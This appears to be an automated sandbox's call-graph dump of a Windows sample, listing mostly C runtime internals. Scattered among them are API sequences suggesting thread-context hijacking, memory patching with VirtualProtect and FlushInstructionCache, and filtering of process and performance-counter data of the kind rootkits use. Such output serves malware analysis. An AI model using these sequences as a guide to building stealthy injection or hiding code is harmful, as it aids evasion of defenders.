202c0aeb9f8 __free_lconv_num 13 API calls 7855->7859 7855->7863 7856->7863 7865 202c0aebb0b 7857->7865 7860 202c0aeaf2c 14 API calls 7858->7860 7859->7858 7860->7863 7861 202c0aebb12 GetLastError 7864 202c0aeb8f0 13 API calls 7861->7864 7862 202c0aebb4b 7862->7863 7867 202c0aed144 MultiByteToWideChar 7862->7867 7863->7834 7868 202c0aebb1f 7864->7868 7865->7861 7865->7862 7866 202c0aebb3f 7865->7866 7869 202c0aeb9f8 __free_lconv_num 13 API calls 7865->7869 7870 202c0aeaf2c 14 API calls 7866->7870 7871 202c0aebb93 7867->7871 7872 202c0aeb960 _set_errno_from_matherr 13 API calls 7868->7872 7869->7866 7870->7862 7871->7861 7871->7863 7872->7863 7874 202c0aebc0f 7873->7874 7875 202c0aebbed 7873->7875 7876 202c0aebc68 7874->7876 7880 202c0aebc14 7874->7880 7877 202c0aeb9f8 __free_lconv_num 13 API calls 7875->7877 7879 202c0aebbfb 7875->7879 7878 202c0aed1a0 WideCharToMultiByte 7876->7878 7877->7879 7887 202c0aebc8c 7878->7887 7879->7841 7880->7879 7881 202c0aebc28 7880->7881 7882 202c0aeb9f8 __free_lconv_num 13 API calls 7880->7882 7883 202c0aeaf2c 14 API calls 7881->7883 7882->7881 7883->7879 7884 202c0aebc93 GetLastError 7886 202c0aeb8f0 13 API calls 7884->7886 7885 202c0aebcce 7885->7879 7889 202c0aed1a0 WideCharToMultiByte 7885->7889 7890 202c0aebca0 7886->7890 7887->7884 7887->7885 7888 202c0aebcc3 7887->7888 7891 202c0aeb9f8 __free_lconv_num 13 API calls 7887->7891 7892 202c0aeaf2c 14 API calls 7888->7892 7893 202c0aebd1f 7889->7893 7894 202c0aeb960 _set_errno_from_matherr 13 API calls 7890->7894 7891->7888 7892->7885 7893->7879 7893->7884 7894->7879 7895 202c0aea150 7896 202c0aea16d GetModuleHandleW 7895->7896 7897 202c0aea1b7 7895->7897 7896->7897 7903 202c0aea17a 7896->7903 7910 202c0aea048 7897->7910 7903->7897 7905 202c0aea258 GetModuleHandleExW 7903->7905 7906 202c0aea27e GetProcAddress 7905->7906 7907 202c0aea295 7905->7907 7906->7907 7908 202c0aea2ad 7907->7908 7909 202c0aea2a7 FreeLibrary 7907->7909 7908->7897 7909->7908 7924 202c0aeaebc EnterCriticalSection 7910->7924 6676 202c0ae1ac8 6683 202c0ae1628 GetProcessHeap HeapAlloc 6676->6683 6678 202c0ae1ad7 6679 202c0ae1ade SleepEx 6678->6679 6682 202c0ae1598 StrCmpIW StrCmpW 6678->6682 6734 202c0ae18b4 6678->6734 6680 202c0ae1628 50 API calls 6679->6680 6680->6678 6682->6678 6751 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6683->6751 6685 202c0ae1650 6752 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6685->6752 6687 202c0ae1658 6753 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6687->6753 6689 202c0ae1661 6754 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6689->6754 6691 202c0ae166a 6755 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6691->6755 6693 202c0ae1673 6756 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6693->6756 6695 202c0ae167c 6757 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6695->6757 6697 202c0ae1685 6758 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6697->6758 6699 202c0ae168e RegOpenKeyExW 6700 202c0ae16c0 RegOpenKeyExW 6699->6700 6701 202c0ae18a6 6699->6701 6702 202c0ae16ff RegOpenKeyExW 6700->6702 6703 202c0ae16e9 6700->6703 6701->6678 6704 202c0ae173a RegOpenKeyExW 6702->6704 6705 202c0ae1723 6702->6705 6759 202c0ae12bc RegQueryInfoKeyW 6703->6759 6708 202c0ae175e 6704->6708 6709 202c0ae1775 RegOpenKeyExW 6704->6709 6768 202c0ae104c RegQueryInfoKeyW 6705->6768 6712 202c0ae12bc 16 API calls 6708->6712 6713 202c0ae17b0 RegOpenKeyExW 6709->6713 6714 202c0ae1799 6709->6714 6715 202c0ae176b RegCloseKey 6712->6715 6717 202c0ae17eb RegOpenKeyExW 6713->6717 6718 202c0ae17d4 6713->6718 6716 202c0ae12bc 16 API calls 6714->6716 6715->6709 6721 202c0ae17a6 RegCloseKey 6716->6721 6719 202c0ae180f 6717->6719 6720 202c0ae1826 RegOpenKeyExW 6717->6720 6722 202c0ae12bc 16 API calls 6718->6722 6723 202c0ae104c 6 API calls 6719->6723 6724 202c0ae1861 RegOpenKeyExW 6720->6724 6725 202c0ae184a 6720->6725 6721->6713 6726 202c0ae17e1 RegCloseKey 6722->6726 6727 202c0ae181c RegCloseKey 6723->6727 6729 202c0ae189c RegCloseKey 6724->6729 6730 202c0ae1885 6724->6730 6728 202c0ae104c 6 API calls 6725->6728 6726->6717 6727->6720 6731 202c0ae1857 RegCloseKey 6728->6731 6729->6701 6732 202c0ae104c 6 API calls 6730->6732 6731->6724 6733 202c0ae1892 RegCloseKey 6732->6733 6733->6729 6773 202c0ae14a4 6734->6773 6751->6685 6752->6687 6753->6689 6754->6691 6755->6693 6756->6695 6757->6697 6758->6699 6760 202c0ae148a RegCloseKey 6759->6760 6761 202c0ae1327 GetProcessHeap HeapAlloc 6759->6761 6760->6702 6762 202c0ae1476 GetProcessHeap HeapFree 6761->6762 6763 202c0ae1352 RegEnumValueW 6761->6763 6762->6760 6764 202c0ae13a5 6763->6764 6764->6762 6764->6763 6765 202c0ae152c 2 API calls 6764->6765 6766 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 6764->6766 6767 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6764->6767 6765->6764 6766->6764 6767->6766 6769 202c0ae10bf 6768->6769 6770 202c0ae11b7 RegCloseKey 6768->6770 6769->6770 6771 202c0ae10cf RegEnumValueW 6769->6771 6772 202c0ae1150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6769->6772 6770->6704 6771->6769 6772->6769 6774 202c0ae14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 6773->6774 6775 202c0ae14c1 GetProcessHeap HeapFree 6773->6775 6775->6774 6775->6775 7124 202c0ae9448 7131 202c0ae98c4 7124->7131 7130 202c0ae9455 7147 202c0ae9bac 7131->7147 7134 202c0ae9451 7134->7130 7136 202c0ae9858 7134->7136 7135 202c0ae98f8 __vcrt_uninitialize_locks DeleteCriticalSection 7135->7134 7161 202c0ae9a80 7136->7161 7152 202c0ae9930 7147->7152 7150 202c0ae98dc 7150->7134 7150->7135 7151 202c0ae9bf7 InitializeCriticalSectionAndSpinCount 7151->7150 7153 202c0ae9a4a 7152->7153 7159 202c0ae9974 try_get_function 7152->7159 7153->7150 7153->7151 7154 202c0ae99a2 LoadLibraryExW 7156 202c0ae9a19 7154->7156 7157 202c0ae99c3 GetLastError 7154->7157 7155 202c0ae9a39 GetProcAddress 7155->7153 7156->7155 7158 202c0ae9a30 FreeLibrary 7156->7158 7157->7159 7158->7155 7159->7153 7159->7154 7159->7155 7160 202c0ae99e5 LoadLibraryExW 7159->7160 7160->7156 7160->7159 7162 202c0ae9930 __vcrt_FlsAlloc 5 API calls 7161->7162 7163 202c0ae9aa5 TlsAlloc 7162->7163 7932 202c0ae2344 GetProcessIdOfThread GetCurrentProcessId 7933 202c0ae236f CreateFileW 7932->7933 7935 202c0ae23ea 7932->7935 7934 202c0ae23a3 WriteFile ReadFile CloseHandle 7933->7934 7933->7935 7934->7935 7936 202c0aeab44 7937 202c0aeb9f8 __free_lconv_num 13 API calls 7936->7937 7938 202c0aeab54 7937->7938 7939 202c0aeb9f8 __free_lconv_num 13 API calls 7938->7939 7940 202c0aeab68 7939->7940 7941 202c0aeb9f8 __free_lconv_num 13 API calls 7940->7941 7942 202c0aeab7c 7941->7942 7943 202c0aeb9f8 __free_lconv_num 13 API calls 7942->7943 7944 202c0aeab90 7943->7944 7704 202c0af2bc2 7705 202c0af2bd1 7704->7705 7706 202c0af2bdb 7704->7706 7708 202c0aeaf10 LeaveCriticalSection 7705->7708 8122 202c0ae60c3 8123 202c0ae60d0 8122->8123 8124 202c0ae60dc GetThreadContext 8123->8124 8131 202c0ae623a 8123->8131 8125 202c0ae6102 8124->8125 8124->8131 8126 202c0ae6129 8125->8126 8125->8131 8133 202c0ae6186 SetThreadContext 8126->8133 8134 202c0ae61ad 8126->8134 8127 202c0ae6261 VirtualProtect FlushInstructionCache 8127->8131 8128 202c0ae631e 8129 202c0ae633e 8128->8129 8140 202c0ae4800 8128->8140 8144 202c0ae5210 GetCurrentProcess 8129->8144 8131->8127 8131->8128 8133->8134 8135 202c0ae6397 8138 202c0ae7d60 _handle_error 8 API calls 8135->8138 8136 202c0ae6357 ResumeThread 8137 202c0ae6343 8136->8137 8137->8135 8137->8136 8139 202c0ae63df 8138->8139 8142 202c0ae481c 8140->8142 8141 202c0ae487f 8141->8129 8142->8141 8143 202c0ae4832 VirtualFree 8142->8143 8143->8142 8145 202c0ae522c 8144->8145 8146 202c0ae5242 VirtualProtect FlushInstructionCache 8145->8146 8147 202c0ae5273 8145->8147 8146->8145 8147->8137 7165 202c0af2a61 __scrt_dllmain_exception_filter 8148 202c0ae3ed9 8153 202c0ae3e26 _invalid_parameter_noinfo 8148->8153 8149 202c0ae3e90 8150 202c0ae3e76 VirtualQuery 8150->8149 8150->8153 8151 202c0ae3eaa VirtualAlloc 8151->8149 8152 202c0ae3edb GetLastError 8151->8152 8152->8149 8152->8153 8153->8149 8153->8150 8153->8151 8154 202c0ae5cd9 8155 202c0ae5ce0 VirtualProtect 8154->8155 8156 202c0ae5d09 GetLastError 8155->8156 8157 202c0ae5bf0 8155->8157 8156->8157 7166 202c0ae5654 7167 202c0ae565a 7166->7167 7178 202c0ae7c90 7167->7178 7171 202c0ae56be 7173 202c0ae5757 _invalid_parameter_noinfo 7173->7171 7175 202c0ae58dd 7173->7175 7191 202c0ae7860 7173->7191 7174 202c0ae59db 7175->7174 7176 202c0ae5a57 VirtualProtect 7175->7176 7176->7171 7177 202c0ae5a83 GetLastError 7176->7177 7177->7171 7179 202c0ae7c9b 7178->7179 7180 202c0ae569d 7179->7180 7181 202c0ae9e44 _set_errno_from_matherr 2 API calls 7179->7181 7182 202c0ae7cba 7179->7182 7180->7171 7187 202c0ae40e0 7180->7187 7181->7179 7183 202c0ae7cc5 7182->7183 7197 202c0ae84bc 7182->7197 7201 202c0ae84dc 7183->7201 7188 202c0ae40fd 7187->7188 7190 202c0ae416c _invalid_parameter_noinfo 7188->7190 7210 202c0ae4350 7188->7210 7190->7173 7192 202c0ae78a7 7191->7192 7235 202c0ae7630 7192->7235 7195 202c0ae7d60 _handle_error 8 API calls 7196 202c0ae78d1 7195->7196 7196->7173 7198 202c0ae84ca std::bad_alloc::bad_alloc 7197->7198 7205 202c0ae95f0 7198->7205 7200 202c0ae84db 7202 202c0ae84ea std::bad_alloc::bad_alloc 7201->7202 7203 202c0ae95f0 Concurrency::cancel_current_task 2 API calls 7202->7203 7204 202c0ae7ccb 7203->7204 7206 202c0ae960f 7205->7206 7207 202c0ae962c RtlPcToFileHeader 7205->7207 7206->7207 7208 202c0ae9644 7207->7208 7209 202c0ae9653 RaiseException 7207->7209 7208->7209 7209->7200 7211 202c0ae4397 7210->7211 7213 202c0ae4374 7210->7213 7212 202c0ae43cd 7211->7212 7230 202c0ae3f30 7211->7230 7214 202c0ae43fd 7212->7214 7219 202c0ae3f30 2 API calls 7212->7219 7213->7211 7224 202c0ae3e00 7213->7224 7217 202c0ae4433 7214->7217 7222 202c0ae3e00 3 API calls 7214->7222 7218 202c0ae444f 7217->7218 7220 202c0ae3e00 3 API calls 7217->7220 7221 202c0ae446b 7218->7221 7223 202c0ae3f30 2 API calls 7218->7223 7219->7214 7220->7218 7221->7190 7222->7217 7223->7221 7225 202c0ae3e21 _invalid_parameter_noinfo 7224->7225 7226 202c0ae3e76 VirtualQuery 7225->7226 7227 202c0ae3e90 7225->7227 7228 202c0ae3eaa VirtualAlloc 7225->7228 7226->7225 7226->7227 7227->7211 7228->7227 7229 202c0ae3edb GetLastError 7228->7229 7229->7225 7229->7227 7233 202c0ae3f48 _invalid_parameter_noinfo 7230->7233 7231 202c0ae3fb7 7231->7212 7232 202c0ae3f9d VirtualQuery 7232->7231 7232->7233 7233->7231 7233->7232 7234 202c0ae4002 GetLastError 7233->7234 7234->7231 7234->7233 7236 202c0ae764b 7235->7236 7237 202c0ae7661 SetLastError 7236->7237 7238 202c0ae766f 7236->7238 7237->7238 7238->7195 7709 202c0ae83d4 7712 202c0ae9538 7709->7712 7711 202c0ae83fd 7713 202c0ae9559 7712->7713 7714 202c0ae958e __std_exception_copy 7712->7714 7713->7714 7715 202c0aeac54 __std_exception_copy 30 API calls 7713->7715 7714->7711 7715->7714 7239 202c0aefa54 7242 202c0aecd58 7239->7242 7243 202c0aecdaa 7242->7243 7244 202c0aecd65 7242->7244 7248 202c0aeb41c 7244->7248 7249 202c0aeb42d 7248->7249 7250 202c0aeb432 7248->7250 7251 202c0aed6e0 _set_errno_from_matherr 6 API calls 7249->7251 7252 202c0aed728 _set_errno_from_matherr 6 API calls 7250->7252 7256 202c0aeb43a 7250->7256 7251->7250 7253 202c0aeb451 7252->7253 7254 202c0aeb980 _set_errno_from_matherr 13 API calls 7253->7254 7253->7256 7257 202c0aeb464 7254->7257 7255 202c0aeacb4 33 API calls 7258 202c0aeb4c2 7255->7258 7256->7255 7261 202c0aeb4b4 7256->7261 7259 202c0aeb482 7257->7259 7260 202c0aeb472 7257->7260 7263 202c0aed728 _set_errno_from_matherr 6 API calls 7259->7263 7262 202c0aed728 _set_errno_from_matherr 6 API calls 7260->7262 7273 202c0aecae0 7261->7273 7271 202c0aeb479 7262->7271 7264 202c0aeb48a 7263->7264 7265 202c0aeb4a0 7264->7265 7266 202c0aeb48e 7264->7266 7269 202c0aeb0b4 _set_errno_from_matherr 13 API calls 7265->7269 7268 202c0aed728 _set_errno_from_matherr 6 API calls 7266->7268 7267 202c0aeb9f8 __free_lconv_num 13 API calls 7267->7256 7268->7271 7270 202c0aeb4a8 7269->7270 7272 202c0aeb9f8 __free_lconv_num 13 API calls 7270->7272 7271->7267 7272->7256 7291 202c0aecca0 7273->7291 7275 202c0aecb09 7306 202c0aec7ec 7275->7306 7278 202c0aecb23 7278->7243 7280 202c0aecbcf 7282 202c0aeb9f8 __free_lconv_num 13 API calls 7280->7282 7282->7278 7285 202c0aecbca 7286 202c0aeb960 _set_errno_from_matherr 13 API calls 7285->7286 7286->7280 7287 202c0aecc2c 7287->7280 7331 202c0aec630 7287->7331 7288 202c0aecbef 7288->7287 7289 202c0aeb9f8 __free_lconv_num 13 API calls 7288->7289 7289->7287 7292 202c0aeccc3 7291->7292 7295 202c0aecccd 7292->7295 7346 202c0aeaebc EnterCriticalSection 7292->7346 7294 202c0aecd3f 7294->7275 7295->7294 7298 202c0aeacb4 33 API calls 7295->7298 7299 202c0aecd57 7298->7299 7301 202c0aecdaa 7299->7301 7303 202c0aeb41c 33 API calls 7299->7303 7301->7275 7304 202c0aecd94 7303->7304 7305 202c0aecae0 43 API calls 7304->7305 7305->7301 7307 202c0aead0c 33 API calls 7306->7307 7308 202c0aec800 7307->7308 7309 202c0aec81e 7308->7309 7310 202c0aec80c GetOEMCP 7308->7310 7311 202c0aec833 7309->7311 7312 202c0aec823 GetACP 7309->7312 7310->7311 7311->7278 7313 202c0aeaf2c 7311->7313 7312->7311 7314 202c0aeaf77 7313->7314 7318 202c0aeaf3b _set_errno_from_matherr 7313->7318 7315 202c0aeb960 _set_errno_from_matherr 13 API calls 7314->7315 7317 202c0aeaf75 7315->7317 7316 202c0aeaf5e HeapAlloc 7316->7317 7316->7318 7317->7280 7320 202c0aecdd4 7317->7320 7318->7314 7318->7316 7319 202c0ae9e44 _set_errno_from_matherr 2 API calls 7318->7319 7319->7318 7321 202c0aec7ec 35 API calls 7320->7321 7322 202c0aecdff 7321->7322 7323 202c0aece3c IsValidCodePage 7322->7323 7329 202c0aece7f _invalid_parameter_noinfo 7322->7329 7325 202c0aece4d 7323->7325 7323->7329 7324 202c0ae7d60 _handle_error 8 API calls 7326 202c0aecbc3 7324->7326 7327 202c0aece84 GetCPInfo 7325->7327 7330 202c0aece56 _invalid_parameter_noinfo 7325->7330 7326->7285 7326->7288 7327->7329 7327->7330 7329->7324 7347 202c0aec8fc 7330->7347 7418 202c0aeaebc EnterCriticalSection 7331->7418 7348 202c0aec939 GetCPInfo 7347->7348 7349 202c0aeca2f 7347->7349 7348->7349 7351 202c0aec94c 7348->7351 7350 202c0ae7d60 _handle_error 8 API calls 7349->7350 7352 202c0aecac8 7350->7352 7358 202c0aef514 7351->7358 7352->7329 7357 202c0aef9bc 37 API calls 7357->7349 7359 202c0aead0c 33 API calls 7358->7359 7360 202c0aef556 7359->7360 7361 202c0aed144 MultiByteToWideChar 7360->7361 7363 202c0aef58c 7361->7363 7362 202c0aef593 7365 202c0ae7d60 _handle_error 8 API calls 7362->7365 7363->7362 7364 202c0aeaf2c 14 API calls 7363->7364 7367 202c0aef5b8 _invalid_parameter_noinfo 7363->7367 7364->7367 7366 202c0aec9c3 7365->7366 7373 202c0aef9bc 7366->7373 7368 202c0aed144 MultiByteToWideChar 7367->7368 7369 202c0aef650 7367->7369 7370 202c0aef632 7368->7370 7369->7362 7371 202c0aeb9f8 __free_lconv_num 13 API calls 7369->7371 7370->7369 7372 202c0aef636 GetStringTypeW 7370->7372 7371->7362 7372->7369 7374 202c0aead0c 33 API calls 7373->7374 7375 202c0aef9e1 7374->7375 7378 202c0aef6a4 7375->7378 7379 202c0aef6e6 7378->7379 7380 202c0aed144 MultiByteToWideChar 7379->7380 7384 202c0aef730 7380->7384 7381 202c0aef96f 7382 202c0ae7d60 _handle_error 8 API calls 7381->7382 7383 202c0aec9f6 7382->7383 7383->7357 7384->7381 7385 202c0aeaf2c 14 API calls 7384->7385 7386 202c0aef763 7384->7386 7385->7386 7387 202c0aed144 MultiByteToWideChar 7386->7387 7389 202c0aef867 7386->7389 7388 202c0aef7d5 7387->7388 7388->7389 7406 202c0aed7e0 7388->7406 7389->7381 7390 202c0aeb9f8 __free_lconv_num 13 API calls 7389->7390 7390->7381 7393 202c0aef876 7396 202c0aeaf2c 14 API calls 7393->7396 7398 202c0aef890 7393->7398 7394 202c0aef824 7394->7389 7395 202c0aed7e0 6 API calls 7394->7395 7395->7389 7396->7398 7397 202c0aed7e0 6 API calls 7400 202c0aef911 7397->7400 7398->7389 7398->7397 7399 202c0aef946 7399->7389 7401 202c0aeb9f8 __free_lconv_num 13 API calls 7399->7401 7400->7399 7412 202c0aed1a0 7400->7412 7401->7389 7407 202c0aed3ec try_get_function 5 API calls 7406->7407 7408 202c0aed81e 7407->7408 7409 202c0aed823 7408->7409 7415 202c0aed8bc 7408->7415 7409->7389 7409->7393 7409->7394 7411 202c0aed87f LCMapStringW 7411->7409 7414 202c0aed1c3 WideCharToMultiByte 7412->7414 7416 202c0aed3ec try_get_function 5 API calls 7415->7416 7417 202c0aed8ea 7416->7417 7417->7411 7945 202c0aed354 7946 202c0aed376 7945->7946 7947 202c0aed393 7945->7947 7946->7947 7949 202c0aed384 7946->7949 7948 202c0aed39d 7947->7948 7954 202c0aefa6c 7947->7954 7961 202c0aefaa8 7948->7961 7950 202c0aeb960 _set_errno_from_matherr 13 API calls 7949->7950 7953 202c0aed389 _invalid_parameter_noinfo 7950->7953 7955 202c0aefa8e HeapSize 7954->7955 7956 202c0aefa75 7954->7956 7957 202c0aeb960 _set_errno_from_matherr 13 API calls 7956->7957 7958 202c0aefa7a 7957->7958 7959 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7958->7959 7960 202c0aefa85 7959->7960 7960->7948 7962 202c0aefabd 7961->7962 7963 202c0aefac7 7961->7963 7964 202c0aeaf2c 14 API calls 7962->7964 7965 202c0aefacc 7963->7965 7971 202c0aefad3 _set_errno_from_matherr 7963->7971 7969 202c0aefac5 7964->7969 7966 202c0aeb9f8 __free_lconv_num 13 API calls 7965->7966 7966->7969 7967 202c0aefad9 7970 202c0aeb960 _set_errno_from_matherr 13 API calls 7967->7970 7968 202c0aefb06 HeapReAlloc 7968->7969 7968->7971 7969->7953 7970->7969 7971->7967 7971->7968 7972 202c0ae9e44 _set_errno_from_matherr 2 API calls 7971->7972 7972->7971 7419 202c0ae7eb0 7420 202c0ae7eb9 __scrt_release_startup_lock 7419->7420 7422 202c0ae7ebd 7420->7422 7423 202c0aea500 7420->7423 7424 202c0aea520 7423->7424 7453 202c0aea537 7423->7453 7425 202c0aea53e 7424->7425 7426 202c0aea528 7424->7426 7428 202c0aecd58 43 API calls 7425->7428 7427 202c0aeb960 _set_errno_from_matherr 13 API calls 7426->7427 7429 202c0aea52d 7427->7429 7430 202c0aea543 7428->7430 7431 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7429->7431 7454 202c0aec510 GetModuleFileNameW 7430->7454 7431->7453 7438 202c0aea5cd 7441 202c0aea2e0 33 API calls 7438->7441 7439 202c0aea5b5 7440 202c0aeb960 _set_errno_from_matherr 13 API calls 7439->7440 7442 202c0aea5ba 7440->7442 7445 202c0aea5e9 7441->7445 7443 202c0aeb9f8 __free_lconv_num 13 API calls 7442->7443 7443->7453 7444 202c0aea5ef 7446 202c0aeb9f8 __free_lconv_num 13 API calls 7444->7446 7445->7444 7447 202c0aea61b 7445->7447 7448 202c0aea634 7445->7448 7446->7453 7449 202c0aeb9f8 __free_lconv_num 13 API calls 7447->7449 7451 202c0aeb9f8 __free_lconv_num 13 API calls 7448->7451 7450 202c0aea624 7449->7450 7452 202c0aeb9f8 __free_lconv_num 13 API calls 7450->7452 7451->7444 7452->7453 7453->7422 7455 202c0aec56a 7454->7455 7456 202c0aec556 GetLastError 7454->7456 7457 202c0aead0c 33 API calls 7455->7457 7478 202c0aeb8f0 7456->7478 7460 202c0aec598 7457->7460 7459 202c0aec563 7461 202c0ae7d60 _handle_error 8 API calls 7459->7461 7464 202c0aec5a9 7460->7464 7483 202c0aed614 7460->7483 7463 202c0aea55a 7461->7463 7466 202c0aea2e0 7463->7466 7486 202c0aec3fc 7464->7486 7468 202c0aea31e 7466->7468 7470 202c0aea384 7468->7470 7500 202c0aed108 7468->7500 7469 202c0aea473 7472 202c0aea4a0 7469->7472 7470->7469 7471 202c0aed108 33 API calls 7470->7471 7471->7470 7473 202c0aea4b8 7472->7473 7477 202c0aea4f0 7472->7477 7474 202c0aeb980 _set_errno_from_matherr 13 API calls 7473->7474 7473->7477 7475 202c0aea4e6 7474->7475 7476 202c0aeb9f8 __free_lconv_num 13 API calls 7475->7476 7476->7477 7477->7438 7477->7439 7479 202c0aeb4c4 _set_errno_from_matherr 13 API calls 7478->7479 7480 202c0aeb901 7479->7480 7481 202c0aeb4c4 _set_errno_from_matherr 13 API calls 7480->7481 7482 202c0aeb91a 7481->7482 7482->7459 7484 202c0aed3ec try_get_function 5 API calls 7483->7484 7485 202c0aed634 7484->7485 7485->7464 7487 202c0aec439 7486->7487 7489 202c0aec420 7486->7489 7488 202c0aec43e 7487->7488 7490 202c0aed1a0 WideCharToMultiByte 7487->7490 7488->7489 7492 202c0aeb960 _set_errno_from_matherr 13 API calls 7488->7492 7489->7459 7491 202c0aec491 7490->7491 7491->7488 7493 202c0aec498 GetLastError 7491->7493 7495 202c0aec4c1 7491->7495 7492->7489 7494 202c0aeb8f0 13 API calls 7493->7494 7497 202c0aec4a5 7494->7497 7496 202c0aed1a0 WideCharToMultiByte 7495->7496 7498 202c0aec4e8 7496->7498 7499 202c0aeb960 _set_errno_from_matherr 13 API calls 7497->7499 7498->7489 7498->7493 7499->7489 7501 202c0aed090 7500->7501 7502 202c0aead0c 33 API calls 7501->7502 7503 202c0aed0b4 7502->7503 7503->7468 7504 202c0ae30b0 7505 202c0ae30e0 7504->7505 7506 202c0ae3199 7505->7506 7507 202c0ae30fd PdhGetCounterInfoW 7505->7507 7507->7506 7508 202c0ae311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 7507->7508 7509 202c0ae314d StrCmpW 7508->7509 7510 202c0ae3185 GetProcessHeap HeapFree 7508->7510 7509->7510 7511 202c0ae3162 7509->7511 7510->7506 7511->7510 7513 202c0ae3558 StrCmpNW 7511->7513 7514 202c0ae35f6 7513->7514 7515 202c0ae3586 StrStrW 7513->7515 7514->7511 7515->7514 7516 202c0ae359f StrToIntW 7515->7516 7516->7514 7517 202c0ae35c7 7516->7517 7517->7514 7523 202c0ae1934 OpenProcess 7517->7523 7520 202c0ae3c70 StrCmpNIW 7521 202c0ae35e8 7520->7521 7521->7514 7522 202c0ae1bf4 2 API calls 7521->7522 7522->7514 7524 202c0ae19ba 7523->7524 7525 202c0ae1968 K32GetModuleFileNameExW 7523->7525 7524->7514 7524->7520 7526 202c0ae19b1 CloseHandle 7525->7526 7527 202c0ae1982 PathFindFileNameW lstrlenW 7525->7527 7526->7524 7527->7526 7528 202c0ae19a0 StrCpyW 7527->7528 7528->7526 7529 202c0af2aaf 7530 202c0af2ac7 7529->7530 7536 202c0af2b32 7529->7536 7530->7536 7537 202c0ae977c 7530->7537 7533 202c0ae977c 42 API calls 7534 202c0af2b29 7533->7534 7543 202c0aeac20 7534->7543 7548 202c0ae9798 7537->7548 7540 202c0ae978a 7540->7533 7541 202c0aeacb4 33 API calls 7542 202c0ae9794 7541->7542 7544 202c0aeb348 33 API calls 7543->7544 7546 202c0aeac29 7544->7546 7545 202c0aeacb4 33 API calls 7547 202c0aeac3f 7545->7547 7546->7545 7549 202c0ae9785 7548->7549 7550 202c0ae97b7 GetLastError 7548->7550 7549->7540 7549->7541 7560 202c0ae9b10 7550->7560 7561 202c0ae9930 __vcrt_FlsAlloc 5 API calls 7560->7561 7562 202c0ae9b37 TlsGetValue 7561->7562 7564 202c0aeaaac 7567 202c0aea878 7564->7567 7574 202c0aea840 7567->7574 7575 202c0aea850 7574->7575 7576 202c0aea855 7574->7576 7577 202c0aea7fc 13 API calls 7575->7577 7578 202c0aea85c 7576->7578 7577->7576 7579 202c0aea871 7578->7579 7580 202c0aea86c 7578->7580 7582 202c0aea7fc 7579->7582 7581 202c0aea7fc 13 API calls 7580->7581 7581->7579 7583 202c0aea801 7582->7583 7584 202c0aea832 7582->7584 7585 202c0aea82a 7583->7585 7586 202c0aeb9f8 __free_lconv_num 13 API calls 7583->7586 7587 202c0aeb9f8 __free_lconv_num 13 API calls 7585->7587 7586->7583 7587->7584 7588 202c0ae5cac 7589 202c0ae5cb3 7588->7589 7590 202c0ae5ce0 VirtualProtect 7589->7590 7591 202c0ae5bf0 7589->7591 7590->7591 7592 202c0ae5d09 GetLastError 7590->7592 7592->7591 7593 202c0af16ab 7594 202c0af16eb 7593->7594 7596 202c0af1950 7593->7596 7595 202c0af171f 7594->7595 7594->7596 7597 202c0af1932 7594->7597 7598 202c0af1946 7596->7598 7600 202c0af2230 _log10_special 22 API calls 7596->7600 7601 202c0af2230 7597->7601 7600->7598 7604 202c0af2250 7601->7604 7605 202c0af226a 7604->7605 7606 202c0af224b 7605->7606 7608 202c0af2094 7605->7608 7606->7598 7609 202c0af20d4 _handle_error 7608->7609 7612 202c0af2140 _handle_error 7609->7612 7619 202c0af2350 7609->7619 7611 202c0af217d 7626 202c0af2688 7611->7626 7612->7611 7613 202c0af214d 7612->7613 7622 202c0af1f70 7613->7622 7616 202c0af217b _handle_error 7617 202c0ae7d60 _handle_error 8 API calls 7616->7617 7618 202c0af21a5 7617->7618 7618->7606 7632 202c0af2378 7619->7632 7623 202c0af1fb4 _handle_error 7622->7623 7624 202c0af1fc9 7623->7624 7625 202c0af2688 _set_errno_from_matherr 13 API calls 7623->7625 7624->7616 7625->7624 7627 202c0af2691 7626->7627 7628 202c0af26a6 7626->7628 7629 202c0af269e 7627->7629 7631 202c0aeb960 _set_errno_from_matherr 13 API calls 7627->7631 7630 202c0aeb960 _set_errno_from_matherr 13 API calls 7628->7630 7629->7616 7630->7629 7631->7629 7633 202c0af23b7 _raise_exc _clrfp 7632->7633 7634 202c0af25cc RaiseException 7633->7634 7635 202c0af2372 7634->7635 7635->7612 7977 202c0aedba8 7988 202c0aeaebc EnterCriticalSection 7977->7988 8158 202c0aed940 8159 202c0aed979 8158->8159 8161 202c0aed94a 8158->8161 8160 202c0aed95f FreeLibrary 8160->8161 8161->8159 8161->8160 8162 202c0ae7f3c 8163 202c0ae7f60 __scrt_release_startup_lock 8162->8163 8164 202c0ae9eb9 8163->8164 8165 202c0aeb4c4 _set_errno_from_matherr 13 API calls 8163->8165 8166 202c0ae9ee2 8165->8166 8167 202c0aea13b 8168 202c0aeac20 33 API calls 8167->8168 8169 202c0aea140 8168->8169 7719 202c0ae9210 7721 202c0ae9240 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 7719->7721 7720 202c0ae9331 7721->7720 7722 202c0ae92fc RtlUnwindEx 7721->7722 7722->7721 7723 202c0ae2c10 7724 202c0ae2c81 7723->7724 7725 202c0ae2e87 7724->7725 7726 202c0ae2cb1 GetModuleHandleA 7724->7726 7727 202c0ae2cd5 7726->7727 7728 202c0ae2cc3 GetProcAddress 7726->7728 7727->7725 7729 202c0ae2cfc StrCmpNIW 7727->7729 7728->7727 7729->7725 7730 202c0ae2d21 7729->7730 7730->7725 7731 202c0ae1934 6 API calls 7730->7731 7732 202c0ae2e34 lstrlenW 7730->7732 7733 202c0ae1bf4 2 API calls 7730->7733 7734 202c0ae3c70 StrCmpNIW 